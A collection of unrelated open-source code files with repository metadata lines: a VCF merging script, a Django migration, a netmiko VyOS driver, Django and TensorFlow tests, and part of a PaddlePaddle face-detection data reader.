filter_columns))))
filter_columns_names.remove('FORMAT')
filter_columns_names.remove('FILTER')
filter_columns_names.remove('TUMOR')
filter_columns_names.remove('NORMAL')
filter_columns_names.remove('QUAL')
filter_columns_names.remove('INFO')
if 'SS' in filter_columns_names:
filter_columns_names.remove('SS')
filter_columns_names.append('SS')
format_all = ':'.join(filter_columns_names)
lines_df['FORMAT'] = format_all
group_dict = {
'INFO': lambda x: change_info(x, file_type),
'AD_normal': lambda x: change_format(x, file_type, 'AD_normal'),
'AD_tumor': lambda x: change_format(x, file_type, 'AD_tumor'),
'BQ_normal': lambda x: change_format(x, file_type, 'BQ_normal'),
'BQ_tumor': lambda x: change_format(x, file_type, 'BQ_tumor'),
'QSS_normal': lambda x: change_format(x, file_type, 'QSS_normal'),
'QSS_tumor': lambda x: change_format(x, file_type, 'QSS_tumor'),
'BCOUNT_normal': lambda x: change_format(x, file_type, 'BCOUNT_normal'),
'BCOUNT_tumor': lambda x: change_format(x, file_type, 'BCOUNT_tumor'),
'SSC_normal': lambda x: change_format(x, file_type, 'SSC_normal'),
'SSC_tumor': lambda x: change_format(x, file_type, 'SSC_tumor'),
'RD_normal': lambda x: change_format(x, file_type, 'RD_normal'),
'RD_tumor': lambda x: change_format(x, file_type, 'RD_tumor')
}
for col in filter_columns:
if col in ['AD_normal', 'AD_tumor',
'BQ_normal', 'BQ_tumor',
'QSS_normal', 'QSS_tumor',
'BCOUNT_normal', 'BCOUNT_tumor',
'SSC_normal', 'SSC_tumor',
'RD_normal', 'RD_tumor']:
continue
else:
group_dict[col] = 'first'
for col in ['AD_normal', 'AD_tumor',
'BQ_normal', 'BQ_tumor',
'QSS_normal', 'QSS_tumor',
'BCOUNT_normal', 'BCOUNT_tumor',
'SSC_normal', 'SSC_tumor',
'RD_normal', 'RD_tumor']:
if col not in filter_columns:
del group_dict[col]
lines_df_grouped = lines_df.groupby(['CHROM', 'POS', 'ID',
'REF',
'ALT']).agg(group_dict).reset_index()
normal_filter_column_names = filter_columns_names.copy()
try:
normal_filter_column_names.remove('SS')
except ValueError:
pass
lines_df_grouped['NORMAL'] = lines_df_grouped.apply(lambda x: ':'.join(
map(lambda y: '' if str(y) == 'nan' else str(y),
[x[col_name] for col_name in list(map(
lambda y: y + '_normal', normal_filter_column_names))])
), axis=1)
lines_df_grouped['TUMOR'] = lines_df_grouped.apply(lambda x: ':'.join(
map(lambda y: '' if str(y) == 'nan' else str(y),
[x[col_name] for col_name in list(map(lambda y: y + '_tumor', filter_columns_names))])
), axis=1)
lines_df_grouped = lines_df_grouped[columns]
for index, row in lines_df_grouped.iterrows():
combined.write('\t'.join(row.tolist()).encode('utf-8')+b'\n')
with open(output_folder + '/temp/' + patient+'_'+file_type+'.vcf', 'rb') as combined, \
gzip.open(output_folder + '/' + patient+'_'+file_type+'.vcf.gz', 'wb') as f_out:
shutil.copyfileobj(combined, f_out)
with open(output_folder + '/do_not_use.txt', 'r') as file_dont:
do_not_use = []
for line in file_dont.readlines():
do_not_use.append(line.strip())
gz_files_single = []
for file in gz_files:
if file[-6:] == 'vcf.gz' and file not in do_not_use:
gz_files_single.append(file)
for file in gz_files_single:
if copy_input == 1:
shutil.copyfile(file, output_folder + '/' + file.split('/')[-1])
else:
shutil.move(file, output_folder + '/' + file.split('/')[-1])
click.echo("Cleaning temp folder")
for filename in os.listdir(output_folder + '/temp'):
file_path = os.path.join(output_folder + '/temp', filename)
try:
if os.path.isfile(file_path) or os.path.islink(file_path):
os.unlink(file_path)
elif os.path.isdir(file_path):
shutil.rmtree(file_path)
except Exception as e:
print('Failed to delete {}. Reason: {}'.format(file_path, e))
@click.command()
@click.argument('input_folder')
@click.argument('output_folder')
@click.option('--copy_input', '-c')
def main(input_folder, output_folder, copy_input=''
):
if not copy_input:
copy_input = 0
copy_input = int(copy_input)
make_unique_files(input_folder, output_folder, copy_input)
if __name__ == "__main__":
main()
| 54.048458 | 118 | 0.482109 |
4a1e5bcca3f2c77d50129d61870bb330f4ce996a | 1,319 | py | Python | tdl/migrations/0004_auto_20181214_0633.py | chrstsrs/ToDoList | 8e13c5a8f6cabad0cf3f715ba9134dd82a46cc3e | [
"MIT"
] | 1 | 2019-01-18T07:47:04.000Z | 2019-01-18T07:47:04.000Z | tdl/migrations/0004_auto_20181214_0633.py | chrstsrs/ToDoList | 8e13c5a8f6cabad0cf3f715ba9134dd82a46cc3e | [
"MIT"
] | 6 | 2020-02-11T23:33:32.000Z | 2022-03-11T23:38:01.000Z | tdl/migrations/0004_auto_20181214_0633.py | chrstsrs/todolist | 8e13c5a8f6cabad0cf3f715ba9134dd82a46cc3e | [
"MIT"
] | null | null | null | # Generated by Django 2.1.2 on 2018-12-14 06:33
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('tdl', '0003_auto_20181129_2059'),
]
operations = [
migrations.CreateModel(
name='Preferences',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('show_all', models.BooleanField(default=False)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='+', to=settings.AUTH_USER_MODEL)),
],
),
migrations.AlterField(
model_name='task',
name='done_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='task',
name='issued_by',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='issued', to=settings.AUTH_USER_MODEL),
),
]
| 37.685714 | 153 | 0.621683 |
4a1e5c6ee93184e15a30a113dee8b425f896e8bf | 460 | py | Python | bikes/bikes.py | sethmenghi/cosc288-machine-learning | 4f17a3fe7229ded4c0fc42e9ee3595e6a07f26eb | [
"0BSD"
] | null | null | null | bikes/bikes.py | sethmenghi/cosc288-machine-learning | 4f17a3fe7229ded4c0fc42e9ee3595e6a07f26eb | [
"0BSD"
] | null | null | null | bikes/bikes.py | sethmenghi/cosc288-machine-learning | 4f17a3fe7229ded4c0fc42e9ee3595e6a07f26eb | [
"0BSD"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Name: Seth menghi
# E-mail Address: [email protected]
# Platform: MacOS
# Language/Environment: python
#
# In accordance with the class policies and Georgetown's Honor Code,
# I certify that, with the exceptions of the class resources and those
# items noted below, I have neither given nor received any assistance
# on this project.
#
from .traintestsets import TrainTestSets
t = TrainTestSets('-t ..data/bikes.mff')
print(t)
| 25.555556 | 70 | 0.741304 |
4a1e5cee3eceb4983d254273b0dd51c5133a7099 | 4,046 | py | Python | netmiko/vyos/vyos_ssh.py | AAm-kun/netmiko | 1c5d2e4c345778ee46e5e487f62c66d02f297625 | [
"MIT"
] | null | null | null | netmiko/vyos/vyos_ssh.py | AAm-kun/netmiko | 1c5d2e4c345778ee46e5e487f62c66d02f297625 | [
"MIT"
] | null | null | null | netmiko/vyos/vyos_ssh.py | AAm-kun/netmiko | 1c5d2e4c345778ee46e5e487f62c66d02f297625 | [
"MIT"
] | null | null | null | from typing import Optional
import time
import warnings
from netmiko.no_enable import NoEnable
from netmiko.base_connection import DELAY_FACTOR_DEPR_SIMPLE_MSG
from netmiko.cisco_base_connection import CiscoSSHConnection
class VyOSSSH(NoEnable, CiscoSSHConnection):
"""Implement methods for interacting with VyOS network devices."""
def session_preparation(self):
"""Prepare the session after the connection has been established."""
self._test_channel_read()
self.set_base_prompt()
self.set_terminal_width(command="set terminal width 512", pattern="terminal")
self.disable_paging(command="set terminal length 0")
# Clear the read buffer
time.sleep(0.3 * self.global_delay_factor)
self.clear_buffer()
def check_config_mode(self, check_string="#"):
"""Checks if the device is in configuration mode"""
return super().check_config_mode(check_string=check_string)
def config_mode(
self,
config_command: str = "configure",
pattern: str = r"\[edit\]",
re_flags: int = 0,
) -> str:
return super().config_mode(
config_command=config_command, pattern=pattern, re_flags=re_flags
)
def exit_config_mode(self, exit_config="exit", pattern=r"exit"):
"""Exit configuration mode"""
output = ""
if self.check_config_mode():
output = self.send_command_timing(
exit_config, strip_prompt=False, strip_command=False
)
if "Cannot exit: configuration modified" in output:
output += self.send_command_timing(
"exit discard", strip_prompt=False, strip_command=False
)
if self.check_config_mode():
raise ValueError("Failed to exit configuration mode")
return output
def commit(
self,
comment: str = "",
read_timeout: float = 120,
delay_factor: Optional[float] = None,
) -> str:
"""
Commit the candidate configuration.
Commit the entered configuration. Raise an error and return the failure
if the commit fails.
default:
command_string = commit
comment:
command_string = commit comment <comment>
delay_factor: Deprecated in Netmiko 4.x. Will be eliminated in Netmiko 5.
"""
if delay_factor is not None:
warnings.warn(DELAY_FACTOR_DEPR_SIMPLE_MSG, DeprecationWarning)
error_marker = ["Failed to generate committed config", "Commit failed"]
command_string = "commit"
if comment:
command_string += f' comment "{comment}"'
output = self.config_mode()
output += self.send_command_expect(
command_string,
strip_prompt=False,
strip_command=False,
read_timeout=read_timeout,
)
if any(x in output for x in error_marker):
raise ValueError(f"Commit failed with following errors:\n\n{output}")
return output
def set_base_prompt(
self, pri_prompt_terminator="$", alt_prompt_terminator="#", delay_factor=1
):
"""Sets self.base_prompt: used as delimiter for stripping of trailing prompt in output."""
prompt = super().set_base_prompt(
pri_prompt_terminator=pri_prompt_terminator,
alt_prompt_terminator=alt_prompt_terminator,
delay_factor=delay_factor,
)
# Set prompt to user@hostname (remove two additional characters)
self.base_prompt = prompt[:-2].strip()
return self.base_prompt
def send_config_set(self, config_commands=None, exit_config_mode=False, **kwargs):
"""Remain in configuration mode."""
return super().send_config_set(
config_commands=config_commands, exit_config_mode=exit_config_mode, **kwargs
)
def save_config(self, *args, **kwargs):
"""Not Implemented"""
raise NotImplementedError
| 35.182609 | 98 | 0.640386 |
4a1e5edddb7b8d4c19426221dbf55bbdcaa6d341 | 8,995 | py | Python | test/images/spot_info.py | sbutler/spotseeker_server | 02bd2d646eab9f26ddbe8536b30e391359796c9c | [
"Apache-2.0"
] | null | null | null | test/images/spot_info.py | sbutler/spotseeker_server | 02bd2d646eab9f26ddbe8536b30e391359796c9c | [
"Apache-2.0"
] | null | null | null | test/images/spot_info.py | sbutler/spotseeker_server | 02bd2d646eab9f26ddbe8536b30e391359796c9c | [
"Apache-2.0"
] | null | null | null | """ Copyright 2012, 2013 UW Information Technology, University of Washington
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from django.conf import settings
from django.core import cache
from django.core.files import File
from django.test import TestCase
from django.test.client import Client
from django.test.utils import override_settings
from mock import patch
from os.path import abspath, dirname
from PIL import Image
from spotseeker_server import models
from spotseeker_server.models import Spot, SpotImage
import datetime
import simplejson as json
TEST_ROOT = abspath(dirname(__file__))
@override_settings(SPOTSEEKER_AUTH_MODULE='spotseeker_server.auth.all_ok',
SPOTSEEKER_SPOT_FORM='spotseeker_server.default_forms.spot.DefaultSpotForm')
class SpotResourceImageTest(TestCase):
def setUp(self):
spot = Spot.objects.create(name="This is to test images in the spot resource")
self.spot = spot
f = open("%s/../resources/test_gif.gif" % TEST_ROOT)
gif = SpotImage.objects.create(description="This is the GIF test", display_index=1, spot=spot, image=File(f))
f.close()
self.gif = gif
f = open("%s/../resources/test_jpeg.jpg" % TEST_ROOT)
jpeg = SpotImage.objects.create(description="This is the JPEG test", display_index=0,spot=spot, image=File(f))
f.close()
self.jpeg = jpeg
f = open("%s/../resources/test_png.png" % TEST_ROOT)
png = SpotImage.objects.create(description="This is the PNG test", spot=spot, image=File(f))
f.close()
self.png = png
def test_empty_image_data(self):
dummy_cache = cache.get_cache('django.core.cache.backends.dummy.DummyCache')
with patch.object(models, 'cache', dummy_cache):
spot = Spot.objects.create(name="A spot with no images")
c = Client()
response = c.get('/api/v1/spot/{0}'.format(spot.pk))
spot_dict = json.loads(response.content)
self.assertEquals(len(spot_dict["images"]), 0, "Has an empty array for a spot w/ no images")
def test_image_order(self):
dummy_cache = cache.get_cache('django.core.cache.backends.dummy.DummyCache')
with patch.object(models, 'cache', dummy_cache):
c = Client()
response = c.get('/api/v1/spot/{0}'.format(self.spot.pk))
spot_dict = json.loads(response.content)
images_fr_json = spot_dict['images']
images_fr_db = SpotImage.objects.filter(spot=self.spot).order_by('display_index')
# I'm not entirely happy with this batch of assertions, but right now don't have any better ideas
self.assertEquals(images_fr_json[0]['description'], 'This is the PNG test', "Image with display index None is returned first")
self.assertEquals(images_fr_json[1]['description'], 'This is the JPEG test', "Image with display index 0 is returned second")
self.assertEquals(images_fr_json[2]['description'], 'This is the GIF test', "Image with display index 1 is returned third")
def test_image_data(self):
dummy_cache = cache.get_cache('django.core.cache.backends.dummy.DummyCache')
with patch.object(models, 'cache', dummy_cache):
c = Client()
response = c.get('/api/v1/spot/{0}'.format(self.spot.pk))
spot_dict = json.loads(response.content)
self.assertEquals(len(spot_dict["images"]), 3, "Has 3 images")
has_gif = False
has_png = False
has_jpg = False
for image in spot_dict["images"]:
one_sec = datetime.timedelta(seconds=1)
if image["id"] == self.gif.pk:
has_gif = True
self.assertEquals(image["url"], "/api/v1/spot/{0}/image/{1}".format(self.spot.pk, self.gif.pk))
self.assertEquals(image["thumbnail_root"], "/api/v1/spot/{0}/image/{1}/thumb".format(self.spot.pk, self.gif.pk))
self.assertEquals(image["content-type"], "image/gif")
img = Image.open("%s/../resources/test_gif.gif" % TEST_ROOT)
self.assertEquals(image["width"], img.size[0], "Includes the gif width")
self.assertEquals(image["height"], img.size[1], "Includes the gif height")
# I have no idea if this will fail under TZs other than UTC, but here we go
# Creation and modification dates will NOT be the same, but should hopefully be w/in one second
create = datetime.datetime.strptime(image["creation_date"], "%Y-%m-%dT%H:%M:%S.%f+00:00")
mod = datetime.datetime.strptime(image["modification_date"], "%Y-%m-%dT%H:%M:%S.%f+00:00")
delta = mod - create
self.assertTrue(delta < one_sec, "creation_date and modification_date are less than one second apart")
self.assertEquals(image["upload_user"], "", "Lists an empty upload user")
self.assertEquals(image["upload_application"], "", "Lists an empty upload application")
self.assertEquals(image["display_index"], 1, "Image has display index 1")
if image["id"] == self.png.pk:
has_png = True
self.assertEquals(image["url"], "/api/v1/spot/{0}/image/{1}".format(self.spot.pk, self.png.pk))
self.assertEquals(image["thumbnail_root"], "/api/v1/spot/{0}/image/{1}/thumb".format(self.spot.pk, self.png.pk))
self.assertEquals(image["content-type"], "image/png")
img = Image.open("%s/../resources/test_png.png" % TEST_ROOT)
self.assertEquals(image["width"], img.size[0], "Includes the png width")
self.assertEquals(image["height"], img.size[1], "Includes the png height")
# I have no idea if this will fail under TZs other than UTC, but here we go
# Creation and modification dates will NOT be the same, but should hopefully be w/in one second
create = datetime.datetime.strptime(image["creation_date"], "%Y-%m-%dT%H:%M:%S.%f+00:00")
mod = datetime.datetime.strptime(image["modification_date"], "%Y-%m-%dT%H:%M:%S.%f+00:00")
delta = mod - create
self.assertTrue(delta < one_sec, "creation_date and modification_date are less than one second apart")
self.assertEquals(image["upload_user"], "", "Lists an empty upload user")
self.assertEquals(image["upload_application"], "", "Lists an empty upload application")
if image["id"] == self.jpeg.pk:
has_jpg = True
self.assertEquals(image["url"], "/api/v1/spot/{0}/image/{1}".format(self.spot.pk, self.jpeg.pk))
self.assertEquals(image["thumbnail_root"], "/api/v1/spot/{0}/image/{1}/thumb".format(self.spot.pk, self.jpeg.pk))
self.assertEquals(image["content-type"], "image/jpeg")
img = Image.open("%s/../resources/test_jpeg.jpg" % TEST_ROOT)
self.assertEquals(image["width"], img.size[0], "Includes the jpeg width")
self.assertEquals(image["height"], img.size[1], "Includes the jpeg height")
# I have no idea if this will fail under TZs other than UTC, but here we go
# Creation and modification dates will NOT be the same, but should hopefully be w/in one second
create = datetime.datetime.strptime(image["creation_date"], "%Y-%m-%dT%H:%M:%S.%f+00:00")
mod = datetime.datetime.strptime(image["modification_date"], "%Y-%m-%dT%H:%M:%S.%f+00:00")
delta = mod - create
self.assertTrue(delta < one_sec, "creation_date and modification_date are less than one second apart")
self.assertEquals(image["upload_user"], "", "Lists an empty upload user")
self.assertEquals(image["upload_application"], "", "Lists an empty upload application")
self.assertEquals(image["display_index"], 0, "Image has display index 0")
self.assertEquals(has_gif, True, "Found the gif")
self.assertEquals(has_jpg, True, "Found the jpg")
self.assertEquals(has_png, True, "Found the png")
| 55.184049 | 138 | 0.620678 |
4a1e5fa2efe368abaf7fb13c3717a6508d3b391b | 8,441 | py | Python | v0.5.0/google/research_v3.32/gnmt-tpuv3-32/code/gnmt/model/staging/models/rough/nmt/utils/iterator_utils_test.py | myelintek/results | 11c38436a158c453e3011f8684570f7a55c03330 | [
"Apache-2.0"
] | 44 | 2018-11-07T18:52:33.000Z | 2019-07-06T12:48:18.000Z | v0.5.0/google/research_v3.32/gnmt-tpuv3-32/code/gnmt/model/staging/models/rough/nmt/utils/iterator_utils_test.py | myelintek/results | 11c38436a158c453e3011f8684570f7a55c03330 | [
"Apache-2.0"
] | 12 | 2018-12-13T18:04:36.000Z | 2019-06-14T20:49:33.000Z | v0.5.0/google/research_v3.32/gnmt-tpuv3-32/code/gnmt/model/staging/models/rough/nmt/utils/iterator_utils_test.py | myelintek/results | 11c38436a158c453e3011f8684570f7a55c03330 | [
"Apache-2.0"
] | 44 | 2018-11-09T21:04:52.000Z | 2019-06-24T07:40:28.000Z | # Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for iterator_utils."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from tensorflow.python.ops import lookup_ops
from utils import iterator_utils
class IteratorUtilsTest(tf.test.TestCase):
def testGetIterator(self):
tf.set_random_seed(1)
tgt_vocab_table = src_vocab_table = lookup_ops.index_table_from_tensor(
tf.constant(["a", "b", "c", "eos", "sos"]))
src_dataset = tf.data.Dataset.from_tensor_slices(
tf.constant(["f e a g", "c c a", "d", "c a"]))
tgt_dataset = tf.data.Dataset.from_tensor_slices(
tf.constant(["c c", "a b", "", "b c"]))
hparams = tf.contrib.training.HParams(
random_seed=3,
num_buckets=5,
eos="eos",
sos="sos")
batch_size = 2
src_max_len = 3
dataset = iterator_utils.get_iterator(
src_dataset=src_dataset,
tgt_dataset=tgt_dataset,
src_vocab_table=src_vocab_table,
tgt_vocab_table=tgt_vocab_table,
batch_size=batch_size,
sos=hparams.sos,
eos=hparams.eos,
random_seed=hparams.random_seed,
num_buckets=hparams.num_buckets,
src_max_len=src_max_len,
reshuffle_each_iteration=False)
table_initializer = tf.tables_initializer()
iterator = dataset.make_initializable_iterator()
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(table_initializer)
sess.run(iterator.initializer)
features = sess.run(get_next)
self.assertAllEqual(
[[2, 0, 3], # c a eos -- eos is padding
[2, 2, 0]], # c c a
features["source"])
self.assertAllEqual([2, 3], features["source_sequence_length"])
self.assertAllEqual(
[[4, 1, 2], # sos b c
[4, 0, 1]], # sos a b
features["target_input"])
self.assertAllEqual(
[[1, 2, 3], # b c eos
[0, 1, 3]], # a b eos
features["target_output"])
self.assertAllEqual([3, 3], features["target_sequence_length"])
def testGetIteratorWithShard(self):
tf.set_random_seed(1)
tgt_vocab_table = src_vocab_table = lookup_ops.index_table_from_tensor(
tf.constant(["a", "b", "c", "eos", "sos"]))
src_dataset = tf.data.Dataset.from_tensor_slices(
tf.constant(["c c a", "f e a g", "d", "c a"]))
tgt_dataset = tf.data.Dataset.from_tensor_slices(
tf.constant(["a b", "c c", "", "b c"]))
hparams = tf.contrib.training.HParams(
random_seed=3,
num_buckets=5,
eos="eos",
sos="sos")
batch_size = 2
src_max_len = 3
dataset = iterator_utils.get_iterator(
src_dataset=src_dataset,
tgt_dataset=tgt_dataset,
src_vocab_table=src_vocab_table,
tgt_vocab_table=tgt_vocab_table,
batch_size=batch_size,
sos=hparams.sos,
eos=hparams.eos,
random_seed=hparams.random_seed,
num_buckets=hparams.num_buckets,
src_max_len=src_max_len,
num_shards=2,
shard_index=1,
reshuffle_each_iteration=False)
table_initializer = tf.tables_initializer()
iterator = dataset.make_initializable_iterator()
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(table_initializer)
sess.run(iterator.initializer)
features = sess.run(get_next)
self.assertAllEqual(
[[2, 0, 3], # c a eos -- eos is padding
[-1, -1, 0]], # "f" == unknown, "e" == unknown, a
features["source"])
self.assertAllEqual([2, 3], features["source_sequence_length"])
self.assertAllEqual(
[[4, 1, 2], # sos b c
[4, 2, 2]], # sos c c
features["target_input"])
self.assertAllEqual(
[[1, 2, 3], # b c eos
[2, 2, 3]], # c c eos
features["target_output"])
self.assertAllEqual([3, 3], features["target_sequence_length"])
def testGetIteratorWithSkipCount(self):
tf.set_random_seed(1)
tgt_vocab_table = src_vocab_table = lookup_ops.index_table_from_tensor(
tf.constant(["a", "b", "c", "eos", "sos"]))
src_dataset = tf.data.Dataset.from_tensor_slices(
tf.constant(["c a", "c c a", "d", "f e a g"]))
tgt_dataset = tf.data.Dataset.from_tensor_slices(
tf.constant(["b c", "a b", "", "c c"]))
hparams = tf.contrib.training.HParams(
random_seed=3,
num_buckets=5,
eos="eos",
sos="sos")
batch_size = 2
src_max_len = 3
skip_count = tf.placeholder(shape=(), dtype=tf.int64)
dataset = iterator_utils.get_iterator(
src_dataset=src_dataset,
tgt_dataset=tgt_dataset,
src_vocab_table=src_vocab_table,
tgt_vocab_table=tgt_vocab_table,
batch_size=batch_size,
sos=hparams.sos,
eos=hparams.eos,
random_seed=hparams.random_seed,
num_buckets=hparams.num_buckets,
src_max_len=src_max_len,
skip_count=skip_count,
reshuffle_each_iteration=False)
table_initializer = tf.tables_initializer()
iterator = dataset.make_initializable_iterator()
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(table_initializer)
sess.run(iterator.initializer, feed_dict={skip_count: 1})
features = sess.run(get_next)
self.assertAllEqual(
[[-1, -1, 0], # "f" == unknown, "e" == unknown, a
[2, 2, 0]], # c c a
features["source"])
self.assertAllEqual([3, 3], features["source_sequence_length"])
self.assertAllEqual(
[[4, 2, 2], # sos c c
[4, 0, 1]], # sos a b
features["target_input"])
self.assertAllEqual(
[[2, 2, 3], # c c eos
[0, 1, 3]], # a b eos
features["target_output"])
self.assertAllEqual([3, 3], features["target_sequence_length"])
# Re-init iterator with skip_count=0.
sess.run(iterator.initializer, feed_dict={skip_count: 0})
features = sess.run(get_next)
self.assertAllEqual(
[[-1, -1, 0], # "f" == unknown, "e" == unknown, a
[2, 2, 0]], # c c a
features["source"])
self.assertAllEqual([3, 3], features["source_sequence_length"])
self.assertAllEqual(
[[4, 2, 2], # sos c c
[4, 0, 1]], # sos a b
features["target_input"])
self.assertAllEqual(
[[2, 2, 3], # c c eos
[0, 1, 3]], # a b eos
features["target_output"])
self.assertAllEqual([3, 3], features["target_sequence_length"])
def testGetInferIterator(self):
src_vocab_table = lookup_ops.index_table_from_tensor(
tf.constant(["a", "b", "c", "eos", "sos"]))
src_dataset = tf.data.Dataset.from_tensor_slices(
tf.constant(["c c a", "c a", "d", "f e a g"]))
hparams = tf.contrib.training.HParams(
random_seed=3,
eos="eos",
sos="sos")
batch_size = 2
dataset = iterator_utils.get_infer_iterator(
src_dataset=src_dataset,
src_vocab_table=src_vocab_table,
batch_size=batch_size,
eos=hparams.eos)
table_initializer = tf.tables_initializer()
iterator = dataset.make_initializable_iterator()
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(table_initializer)
sess.run(iterator.initializer)
features = sess.run(get_next)
self.assertAllEqual(
[
[2, 2, 0], # c c a
[2, 0, 3]
], # c a eos
features["source"])
self.assertAllEqual([3, 2], features["source_sequence_length"])
if __name__ == "__main__":
tf.test.main()
| 35.766949 | 80 | 0.610473 |
4a1e5fd75e599e33491447311f40163454632598 | 258 | py | Python | myia/lib.py | strint/myia | 3d00d3fb3df80ab7a264a724226c5f56c6ff1a8a | [
"MIT"
] | 222 | 2019-02-13T07:56:28.000Z | 2022-03-28T07:07:54.000Z | myia/lib.py | strint/myia | 3d00d3fb3df80ab7a264a724226c5f56c6ff1a8a | [
"MIT"
] | 107 | 2019-02-12T21:56:39.000Z | 2022-03-12T01:08:03.000Z | myia/lib.py | strint/myia | 3d00d3fb3df80ab7a264a724226c5f56c6ff1a8a | [
"MIT"
] | 27 | 2017-11-14T17:58:15.000Z | 2019-01-14T01:36:09.000Z | """Consolidate all Myia functions in a single module."""
from .abstract import *
from .classes import *
from .grad import *
from .hypermap import *
from .info import *
from .ir import *
from .operations import *
from .pipeline import *
from .utils import *
| 21.5 | 56 | 0.728682 |
4a1e5fe6d5ba1a68b80ac7ab82b269878a45be20 | 11,894 | py | Python | PaddleCV/face_detection/reader.py | suytingwan/models | ccdbfe77d071cc19b55fb9f4b738912e35d982ef | [
"Apache-2.0"
] | 5 | 2021-09-28T13:28:01.000Z | 2021-12-21T07:25:44.000Z | PaddleCV/face_detection/reader.py | suytingwan/models | ccdbfe77d071cc19b55fb9f4b738912e35d982ef | [
"Apache-2.0"
] | 1 | 2019-11-18T03:03:37.000Z | 2019-11-18T03:03:37.000Z | PaddleCV/face_detection/reader.py | suytingwan/models | ccdbfe77d071cc19b55fb9f4b738912e35d982ef | [
"Apache-2.0"
] | 4 | 2021-08-11T08:25:10.000Z | 2021-10-16T07:41:59.000Z | # Copyright (c) 2016 PaddlePaddle Authors. All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from PIL import Image
from PIL import ImageDraw
import numpy as np
import xml.etree.ElementTree
import os
import time
import copy
import random
import cv2
import six
import math
from itertools import islice
import paddle
import image_util
class Settings(object):
def __init__(self,
dataset=None,
data_dir=None,
label_file=None,
resize_h=None,
resize_w=None,
mean_value=[104., 117., 123.],
apply_distort=True,
apply_expand=True,
ap_version='11point',
toy=0):
self.dataset = dataset
self.ap_version = ap_version
self.toy = toy
self.data_dir = data_dir
self.apply_distort = apply_distort
self.apply_expand = apply_expand
self.resize_height = resize_h
self.resize_width = resize_w
self.img_mean = np.array(mean_value)[:, np.newaxis, np.newaxis].astype(
'float32')
self.expand_prob = 0.5
self.expand_max_ratio = 4
self.hue_prob = 0.5
self.hue_delta = 18
self.contrast_prob = 0.5
self.contrast_delta = 0.5
self.saturation_prob = 0.5
self.saturation_delta = 0.5
self.brightness_prob = 0.5
# _brightness_delta is the normalized value by 256
self.brightness_delta = 0.125
self.scale = 0.007843 # 1 / 127.5
self.data_anchor_sampling_prob = 0.5
self.min_face_size = 8.0
def to_chw_bgr(image):
"""
Transpose image from HWC to CHW and from RBG to BGR.
Args:
image (np.array): an image with HWC and RBG layout.
"""
# HWC to CHW
if len(image.shape) == 3:
image = np.swapaxes(image, 1, 2)
image = np.swapaxes(image, 1, 0)
# RBG to BGR
image = image[[2, 1, 0], :, :]
return image
def preprocess(img, bbox_labels, mode, settings, image_path):
img_width, img_height = img.size
sampled_labels = bbox_labels
if mode == 'train':
if settings.apply_distort:
img = image_util.distort_image(img, settings)
if settings.apply_expand:
img, bbox_labels, img_width, img_height = image_util.expand_image(
img, bbox_labels, img_width, img_height, settings)
# sampling
batch_sampler = []
# used for continuous evaluation
if 'ce_mode' in os.environ:
random.seed(0)
np.random.seed(0)
prob = np.random.uniform(0., 1.)
if prob > settings.data_anchor_sampling_prob:
scale_array = np.array([16, 32, 64, 128, 256, 512])
batch_sampler.append(
image_util.sampler(1, 10, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.2,
0.0, True))
sampled_bbox = image_util.generate_batch_random_samples(
batch_sampler, bbox_labels, img_width, img_height, scale_array,
settings.resize_width, settings.resize_height)
img = np.array(img)
if len(sampled_bbox) > 0:
idx = int(np.random.uniform(0, len(sampled_bbox)))
img, sampled_labels = image_util.crop_image_sampling(
img, bbox_labels, sampled_bbox[idx], img_width, img_height,
settings.resize_width, settings.resize_height,
settings.min_face_size)
img = img.astype('uint8')
img = Image.fromarray(img)
else:
# hard-code here
batch_sampler.append(
image_util.sampler(1, 50, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 1.0,
0.0, True))
batch_sampler.append(
image_util.sampler(1, 50, 0.3, 1.0, 1.0, 1.0, 0.0, 0.0, 1.0,
0.0, True))
batch_sampler.append(
image_util.sampler(1, 50, 0.3, 1.0, 1.0, 1.0, 0.0, 0.0, 1.0,
0.0, True))
batch_sampler.append(
image_util.sampler(1, 50, 0.3, 1.0, 1.0, 1.0, 0.0, 0.0, 1.0,
0.0, True))
batch_sampler.append(
image_util.sampler(1, 50, 0.3, 1.0, 1.0, 1.0, 0.0, 0.0, 1.0,
0.0, True))
sampled_bbox = image_util.generate_batch_samples(
batch_sampler, bbox_labels, img_width, img_height)
img = np.array(img)
if len(sampled_bbox) > 0:
